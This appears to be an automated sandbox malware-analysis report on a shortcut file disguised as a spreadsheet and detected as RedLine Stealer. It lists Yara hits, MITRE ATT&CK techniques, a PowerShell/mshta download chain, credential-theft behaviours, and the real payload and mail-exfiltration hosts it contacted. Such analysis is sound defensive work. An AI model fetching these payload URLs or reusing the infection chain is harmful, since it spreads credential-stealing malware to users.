                    Source: Yara matchFile source: 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2556241672.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1792368001.0000000028C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000017.00000002.1639938993.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000003.1494437975.000000007EB10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1639938993.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1732584170.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000001.1707928386.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2524457336.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1519434101.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000001.1494452738.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2524457336.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000001.1624046151.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000001.1624046151.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000001.1494452738.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000001.1707928386.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.1732584170.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		1
                    Valid Accounts                    		121
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Valid Accounts                    		11
                    Deobfuscate/Decode Files or Information                    		111
                    Input Capture                    		1
                    System Network Connections Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Shared Modules                    		1
                    Valid Accounts                    		1
                    Access Token Manipulation                    		2
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		2
                    File and Directory Discovery                    		SMB/Windows Admin Shares11
                    Email Collection                    		2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts12
                    Command and Scripting Interpreter                    		1
                    Registry Run Keys / Startup Folder                    		312
                    Process Injection                    		4
                    Software Packing                    		NTDS58
                    System Information Discovery                    		Distributed Component Object Model111
                    Input Capture                    		13
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts21
                    PowerShell                    		Network Logon Script1
                    Registry Run Keys / Startup Folder                    		1
                    Timestomp                    		LSA Secrets261
                    Security Software Discovery                    		SSH1
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials161
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                    Masquerading                    		DCSync13
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Valid Accounts                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Access Token Manipulation                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron161
                    Virtualization/Sandbox Evasion                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd312
                    Process Injection                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430751 Sample: FT. 40FE CNY .xlsx.lnk Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 68 www.sessosesso.it 2->68 70 sessosesso.it 2->70 72 7 other IPs or domains 2->72 84 Found malware configuration 2->84 86 Malicious sample detected (through community Yara rule) 2->86 88 Antivirus detection for URL or domain 2->88 90 20 other signatures 2->90 12 powershell.exe 15 2->12         started        15 Ucvuiswb.PIF 2->15         started        17 Ucvuiswb.PIF 2->17         started        19 svchost.exe 1 1 2->19         started        signatures3 process4 dnsIp5 114 Windows shortcut file (LNK) starts blacklisted processes 12->114 116 Found suspicious powershell code related to unpacking or dynamic code loading 12->116 118 Powershell drops PE file 12->118 22 mshta.exe 16 12->22         started        26 conhost.exe 1 12->26         started        120 Multi AV Scanner detection for dropped file 15->120 122 Machine Learning detection for dropped file 15->122 124 Writes to foreign memory regions 15->124 28 bwsiuvcU.pif 15->28         started        126 Allocates memory in foreign processes 17->126 128 Sample uses process hollowing technique 17->128 30 bwsiuvcU.pif 17->30         started        74 127.0.0.1 unknown unknown 19->74 signatures6 process7 dnsIp8 76 www.sessosesso.it 89.46.106.29, 443, 49705, 49710 ARUBA-ASNIT Italy 22->76 92 Windows shortcut file (LNK) starts blacklisted processes 22->92 94 Suspicious powershell command line found 22->94 32 powershell.exe 16 22->32         started        96 Installs a global keyboard hook 28->96 98 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 30->98 100 Tries to steal Mail credentials (via file / registry access) 30->100 102 Tries to harvest and steal ftp login credentials 30->102 104 Tries to harvest and steal browser information (history, passwords, etc) 30->104 signatures9 process10 signatures11 82 Windows shortcut file (LNK) starts blacklisted processes 32->82 35 powershell.exe 14 31 32->35         started        38 conhost.exe 32->38         started        process12 file13 58 C:\Users\user\AppData\Roaming\uc.exe, PE32 35->58 dropped 40 uc.exe 1 8 35->40         started        process14 dnsIp15 78 dual-spov-0006.spov-msedge.net 13.107.139.11, 443, 49715, 49716 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 40->78 60 C:\Users\Public\Libraries\netutils.dll, PE32+ 40->60 dropped 62 C:\Users\Public\Libraries\easinvoker.exe, PE32+ 40->62 dropped 64 C:\Users\Public\Libraries\bwsiuvcU.pif, PE32 40->64 dropped 66 2 other malicious files 40->66 dropped 106 Windows shortcut file (LNK) starts blacklisted processes 40->106 108 Multi AV Scanner detection for dropped file 40->108 110 Machine Learning detection for dropped file 40->110 112 4 other signatures 40->112 45 bwsiuvcU.pif 2 40->45         started        49 extrac32.exe 1 40->49         started        52 cmd.exe 1 40->52         started        file16 signatures17 process18 dnsIp19 80 mail.irmaklarpaslanmaz.com.tr 192.185.124.132, 49721, 49722, 49723 UNIFIEDLAYER-AS-1US United States 45->80 130 Detected unpacking (changes PE section rights) 45->130 132 Detected unpacking (overwrites its own PE header) 45->132 134 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 45->134 138 3 other signatures 45->138 56 C:\Users\Public\Libraries\Ucvuiswb.PIF, PE32 49->56 dropped 136 Drops PE files with a suspicious file extension 49->136 54 conhost.exe 52->54         started        file20 signatures21 process22

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    FT. 40FE CNY .xlsx.lnk32%ReversingLabsShortcut.Trojan.RedLine
                    FT. 40FE CNY .xlsx.lnk24%VirustotalBrowse
                    FT. 40FE CNY .xlsx.lnk100%AviraLNK/Dldr.Agent.VPYB
                    FT. 40FE CNY .xlsx.lnk100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\Public\Libraries\Ucvuiswb.PIF100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\uc.exe100%Joe Sandbox ML
                    C:\Users\Public\Libraries\Ucvuiswb.PIF58%ReversingLabs
                    C:\Users\Public\Libraries\Ucvuiswb.PIF38%VirustotalBrowse
                    C:\Users\Public\Libraries\bwsiuvcU.pif3%ReversingLabs
                    C:\Users\Public\Libraries\bwsiuvcU.pif0%VirustotalBrowse
                    C:\Users\Public\Libraries\easinvoker.exe0%ReversingLabs
                    C:\Users\Public\Libraries\easinvoker.exe0%VirustotalBrowse
                    C:\Users\Public\Libraries\netutils.dll29%ReversingLabsWin64.Trojan.Zusy
                    C:\Users\Public\Libraries\netutils.dll47%VirustotalBrowse
                    C:\Users\user\AppData\Roaming\uc.exe58%ReversingLabs
                    C:\Users\user\AppData\Roaming\uc.exe38%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    sessosesso.it0%VirustotalBrowse
                    dual-spov-0006.spov-msedge.net0%VirustotalBrowse
                    www.sessosesso.it2%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://crl.microsoft0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                    http://x1.c.lencr.org/00%URL Reputationsafe
                    http://x1.i.lencr.org/00%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    http://r3.o.lencr.org00%URL Reputationsafe
                    http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
                    https://sectigo.com/CPS00%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                    https://go.micro0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://ocsp.sectigo.com0C0%URL Reputationsafe
                    https://www.sessosesso.it/assets/aw/yt.htaAC:0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/yt.htaU0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/yt.htahttps://www.sessosesso.it/assets/aw/yt.hta0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/yt.hta62880%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/yt.htaDe0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/yt.hta_0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/yt.htaPS_BROW0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/uc.exep0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/yt.hta10%Avira URL Cloudsafe
                    https://www.sessosesso.it/0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/uc.exep0%VirustotalBrowse
                    https://www.sessosesso.it/assets/aw/yt.htaindows0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/uc.exe0%VirustotalBrowse
                    https://www.sessosesso.it/assets/aw/yt.htaAC:0%VirustotalBrowse
                    https://www.sessosesso.it/assets/aw/yt.htahttps://www.sessosesso.it/assets/aw/yt.hta0%VirustotalBrowse
                    https://www.sessosesso.it/2%VirustotalBrowse
                    https://www.sessosesso.it/assets/aw/yt.hta50%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/uc.exe100%Avira URL Cloudmalware
                    https://www.sessosesso.it0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/yt.htaH0%Avira URL Cloudsafe
                    https://sessosesso.it0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/yt.htaC:0%Avira URL Cloudsafe
                    http://crl.ver)0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/yt.hta0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/yt.hta...-0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/Book1.xlsx0%Avira URL Cloudsafe
                    https://sessosesso.it1%VirustotalBrowse
                    http://mail.irmaklarpaslanmaz.com.tr0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/yt.htaC:0%VirustotalBrowse
                    http://r3.i.lencr.org/0o0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/yt.hta...0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/Book1.xlsx0%VirustotalBrowse
                    https://www.sessosesso.it2%VirustotalBrowse
                    https://sessosesso.it/assets/aw/Book1.xlsx0%Avira URL Cloudsafe
                    https://www.sessosesso.it/assets/aw/yt.htaLMEMX0%Avira URL Cloudsafe
                    http://r3.i.lencr.org/0o0%VirustotalBrowse
                    http://www.apache.o0%Avira URL Cloudsafe
                    https://sessosesso.it/assets/aw/Book1.xlsx0%VirustotalBrowse
                    https://www.sessosesso.it/assets/aw/yt.hta...0%VirustotalBrowse
                    https://www.sessosesso.it/assets/aw/yt.hta0%VirustotalBrowse
                    https://www.sessosesso.it/assets/aw/yt.htaLMEMX0%VirustotalBrowse
                    http://www.apache.o0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    sessosesso.it
                    		89.46.106.29
                    		truetrueunknown
                    dual-spov-0006.spov-msedge.net
                    		13.107.139.11
                    		truefalseunknown
                    www.sessosesso.it
                    		89.46.106.29
                    		truetrueunknown
                    mail.irmaklarpaslanmaz.com.tr
                    		192.185.124.132
                    		truetrue
                      		unknown
                      zyupsq.by.files.1drv.com
                      		unknown
                      		unknownfalse
                        		high
                        onedrive.live.com
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://www.sessosesso.it/assets/aw/uc.exefalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Yfalse
                            		high
                            https://www.sessosesso.it/assets/aw/yt.htatrue
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://sessosesso.it/assets/aw/Book1.xlsxfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.sessosesso.it/assets/aw/yt.htaDemshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ocsp.sectigo.com0uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.sessosesso.it/assets/aw/yt.htahttps://www.sessosesso.it/assets/aw/yt.htamshta.exe, 00000009.00000003.1859449128.000001A2C48C5000.00000004.00000800.00020000.00000000.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.microsoftpowershell.exe, 00000011.00000002.1634145596.0000029E324B0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.sessosesso.it/assets/aw/yt.htaUmshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.sessosesso.it/assets/aw/yt.htaAC:FT. 40FE CNY .xlsx.lnktrue
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://zyupsq.by.files.1drv.com/uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://www.sessosesso.it/assets/aw/yt.hta6288mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.sessosesso.it/assets/aw/yt.htaPS_BROWmshta.exe, 00000009.00000002.1863884931.0000019AC19B0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.sessosesso.it/assets/aw/yt.hta_mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://onedrive.live.com/_uc.exe, 00000013.00000002.1496845420.00000000007AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.sessosesso.it/assets/aw/uc.exeppowershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.sessosesso.it/assets/aw/yt.hta1mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.sessosesso.it/mshta.exe, 00000009.00000002.1863478690.0000019AC1727000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1724000.00000004.00000020.00020000.00000000.sdmptrue
                                • 2%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.sessosesso.it/assets/aw/yt.htaindowsmshta.exe, 00000009.00000002.1863133474.0000019AC170A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://x1.c.lencr.org/0bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://x1.i.lencr.org/0bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.sessosesso.it/assets/aw/yt.hta5mshta.exe, 00000009.00000002.1863133474.0000019AC16F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://contoso.com/powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://live.com/uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.1813302246.000002B010082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1813302246.000002B0101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
